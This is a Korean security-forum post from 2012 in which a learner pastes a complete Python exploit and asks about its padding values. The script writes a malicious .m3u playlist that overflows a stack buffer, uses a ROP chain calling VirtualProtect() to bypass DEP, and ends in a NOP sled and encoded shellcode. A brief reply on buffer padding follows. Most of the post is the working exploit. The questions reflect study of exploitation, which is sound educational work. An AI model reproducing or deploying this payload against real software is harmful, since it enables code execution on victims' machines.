22019,

1/1101

백트랙

bypass DEP

http://www.hackerschool.org/HS_Boards/zboard.php?AllArticle=true&no=25253 [복사]

ROP를 이용한 DEP 우회, 그리고 ASLR문서를 보다가 궁굼한게 생겼습니다.

------------------exploit 코드---------------------

filename = "rop_6.m3u"
buffer_size = 26074
dummy = "Z" * buffer_size
my_eip = "\xdc\x02\x01\x10" #return to stack
dummy2 = "AAAA"
#------Put stack pointer in EDI & EAX------------------------
rop1_ptr = "\x77\x92\x48\x5a" #PUSH ESP, POP EDI
rop1_ptr2 = "\x42\xe8\xbc\x77" #PUSH EDI, POP EAX
rop1_dummy = "AAAA" #dummy for POP EBP
#stack pointer is now in EAX & EDI, now jump over parameters
rop1_ptr3 = "\x3d\x65\x01\x10" #ADD ESP, 20
#-------Parameters for VirtualProtect()----------------------#
params_ptr = "\xd4\x1a\x7d\x7c" #VirtualProtect()
params_ret = "WWWW" #return address (param1)
params_addr = "XXXX" #lpAddress (param2)
params_size = "YYYY" #size (param3)
params_protect = "ZZZZ" #flNewProtect (param4)
params_writeable = "\x05\x50\x03\x10" #writable address
params_dummy = "H"*8 #padding
# ADD ESP,20 + RET will land here
# change ESI so it points to correct location
# to write first parameter (return address)
rop2_ptr = "\x2f\x98\x31\x76" #XCHG ESI,EDI #DEC ECX #RETN 4
#-----Make eax point at shellcode--------------------------
rop2_ptr2 = "\x4c\xdc\x02\x10" #ADD EAX,100 #POP EBP
rop2_dummy = "AAAA" #padding for RETN4
rop2_dummy2 = "AAAA"
#----------------------------------------------------------
#return address is in EAX - write parameter 1
rop2_ptr3 = "\x15\x41\xd9\x77" #MOV DWORD PTR DS:[ESI+10],EAX
rop2_dummy3 = "AAAA"
#EAX now contains stack pointer
#save it back to ESI first
rop3_ptr = "\x1e\x13\xa6\x76" #PUSH EAX #POP ESI #RETN
#-----Make eax point at shellcode (again)--------------------------
rop3_ptr2 = "\x4c\xdc\x02\x10" #ADD EAX,100 #POP EBP
rop3_dummy = "AAAA" #padding
#increase ESI with 4
rop3_ptr3 = "\x1d\x7d\x10\x77" #INC ESI #RETN [Module : OLEAUT32.dll]
#4 times
#and write lpAddress (param 2)
rop3_ptr4 = "\x15\x41\xd9\x77" #MOV DWORD PTR DS:[ESI+10],EAX
rop3_dummy2 = "AAAA" #padding
#save EAX in ESI again
rop4_ptr = "\x1e\x13\xa6\x76" #PUSH EAX #POP ESI #RETN
#create size - set EAX to 300 or so
rop4_ptr2 = "\xa9\x07\x03\x10" #XOR EAX,EAX #RETN
rop4_ptr3 = "\x4c\xdc\x02\x10" #ADD EAX,100 #POP EBP
#3 times with rop4_dummy
rop4_dummy = "AAAA"
#write size, first set ESI to right place
rop4_ptr4 = "\x1d\x7d\x10\x77" #INC ESI #RETN [Module : OLEAUT32.dll]
#4 times
#write (param 3)
rop4_ptr5 = "\x15\x41\xd9\x77" #MOV DWORD PTR DS:[ESI+10],EAX
rop4_dummy2 = "AAAA" #padding
#save EAX in ESI again
rop5_ptr = "\x1e\x13\xa6\x76" #PUSH EAX #POP ESI #RETN
#flNewProtect 0x40
rop5_ptr2 = "\xa9\x07\x03\x10" #XOR EAX,EAX #RETN
rop5_ptr3 = "\x41\xdc\x02\x10" #ADD EAX,40 #POP EBP
rop5_dummy = "AAAA" #padding
rop5_ptr4 = "\x1d\x7d\x10\x77" #INC ESI #RETN
#4 times
#write (param4)
rop5_ptr5 = "\x15\x41\xd9\x77" #MOV DWORD PTR DS:[ESI+10],EAX
rop5_dummy2 = "AAAA" #padding
#Return to VirtualProtect()
#EAX points at VirtualProtect pointer ( just before parameters)
#compensate for the 2 POP instructions
rop6_ptr = "\xf1\x12\xa6\x76" #SUB EAX,4 #RET
#2 times
#change ESP & fly back
rop6_ptr2 = "\x58\x58\xd5\x73" #PUSH EAX #POP ESP #POP EDI #POP ESI #RETN
nops = "\x90" * 240
shellcode = \
"\xba\x46\xd1\x59\x1e\xda\xc6\xd9\x74\x24\xf4\x5e\x31\xc9\xb1" + \
"\x32\x31\x56\x12\x83\xc6\x04\x03\x10\xdf\xbb\xeb\x60\x37\xb2" + \
"\x14\x98\xc8\xa5\x9d\x7d\xf9\xf7\xfa\xf6\xa8\xc7\x89\x5a\x41" + \
"\xa3\xdc\x4e\xd2\xc1\xc8\x61\x53\x6f\x2f\x4c\x64\x41\xef\x02" + \
"\xa6\xc3\x93\x58\xfb\x23\xad\x93\x0e\x25\xea\xc9\xe1\x77\xa3" + \
"\x86\x50\x68\xc0\xda\x68\x89\x06\x51\xd0\xf1\x23\xa5\xa5\x4b" + \
"\x2d\xf5\x16\xc7\x65\xed\x1d\x8f\x55\x0c\xf1\xd3\xaa\x47\x7e" + \
"\x27\x58\x56\x56\x79\xa1\x69\x96\xd6\x9c\x46\x1b\x26\xd8\x60" + \
"\xc4\x5d\x12\x93\x79\x66\xe1\xee\xa5\xe3\xf4\x48\x2d\x53\xdd" + \
"\x69\xe2\x02\x96\x65\x4f\x40\xf0\x69\x4e\x85\x8a\x95\xdb\x28" + \
"\x5d\x1c\x9f\x0e\x79\x45\x7b\x2e\xd8\x23\x2a\x4f\x3a\x8b\x93" + \
"\xf5\x30\x39\xc7\x8c\x1a\x57\x16\x1c\x21\x1e\x18\x1e\x2a\x30" + \
"\x71\x2f\xa1\xdf\x06\xb0\x60\xa4\xf9\xfa\x29\x8c\x91\xa2\xbb" + \
"\x8d\xff\x54\x16\xd1\xf9\xd6\x93\xa9\xfd\xc7\xd1\xac\xba\x4f" + \
"\x09\xdc\xd3\x25\x2d\x73\xd3\x6f\x4e\x12\x47\xf3\x91";
rest = "C"*300
payload = dummy + my_eip + dummy2 + \
rop1_ptr + rop1_ptr2 + rop1_dummy + rop1_ptr3 + \
params_ptr + params_ret + params_addr + \
params_size + params_protect + params_writeable + params_dummy + \
rop2_ptr + rop2_ptr2 + rop2_dummy + rop2_dummy2 + rop2_ptr3 + rop2_dummy3 + \
rop3_ptr + rop3_ptr2 + rop3_dummy + rop3_ptr3 + rop3_ptr3 + rop3_ptr3 + rop3_ptr3 +
rop3_ptr4 + rop3_dummy2 + \
rop4_ptr + rop4_ptr2 + rop4_ptr3 + rop4_dummy + rop4_ptr3 + rop4_dummy + rop4_ptr3 +
rop4_dummy + rop4_ptr4 + rop4_ptr4 + rop4_ptr4 + rop4_ptr4 + rop4_ptr5 + rop4_dummy2 + \
rop5_ptr + rop5_ptr2 + rop5_ptr3 + rop5_dummy + rop5_ptr4 + rop5_ptr4 + rop5_ptr4 +
rop5_ptr4 + rop5_ptr5 + rop5_dummy2 + \
rop6_ptr + rop6_ptr + rop6_ptr2 + \
nops + shellcode + rest
print "Payload size : ", len(payload)
f = open(filename, 'w')
f.write(payload)
f.close()

----------------DEP를 우회하는 전체 exploit코드----------------------

이 exploit에서 궁굼한점이 있습니다.

1. dummy2 = "AAAA" 이부분은 왜구해주는건가요??
eip가 리턴하고나서 4바이트를 사용하는데 이 값을 AAAA로 채워주는건가요?

2.params_writeable = "\x05\x50\x03\x10" #writable address
프로그램 내에서 실행가능한 주소? 라는게 어떤걸 말하는건가요?

3.params_dummy = "H"*8 #padding
이건 뭘 뜻하는건가요?

4.params_ret = "WWWW" #return address (param1)
params_addr = "XXXX" #lpAddress (param2)
params_size = "YYYY" #size (param3)
params_protect = "ZZZZ" #flNewProtect (param4)
이건 그냥 VirtualProtect()를 사용해서 DEP를 우회할려할떄 이렇게 써주면되는건가요??

5.rop2_dummy = "AAAA" #padding for RETN4
rop2_dummy2 = "AAAA"
이런식으로 계속 dummy값이 있는데 있는 이유는 1번질문과 마찬가지로 리턴하고난후 4바이트를 채워주기위함인가요?

6.rop5_dummy = "AAAA" #padding
이것도 1번질문과 마찬가지인지...

질문이 너무 많네요..ㅜㅜ
꼭 답해주셨으면 좋겠습니다.!
좋은 하루보내세요 :)

Hit : 6608 Date : 2012/09/25 10:00


1010_ksh	버퍼오버플로우를 발생하는데 있어서 1000Byte가 필요한다는 가정하에 버퍼가 400Byte이고 RET값조작하는데 408Byte가 필요하다면 408Byte만 페이로드로 사용하면 될까요? 그럼 버퍼오버플로우가 발생하지 않을 거에요 1000Byte가 넘어야 오버플로우가 발생하니 나머지 1000-408Byte에 대해서는 더미를 써줘야하죠	2012/09/28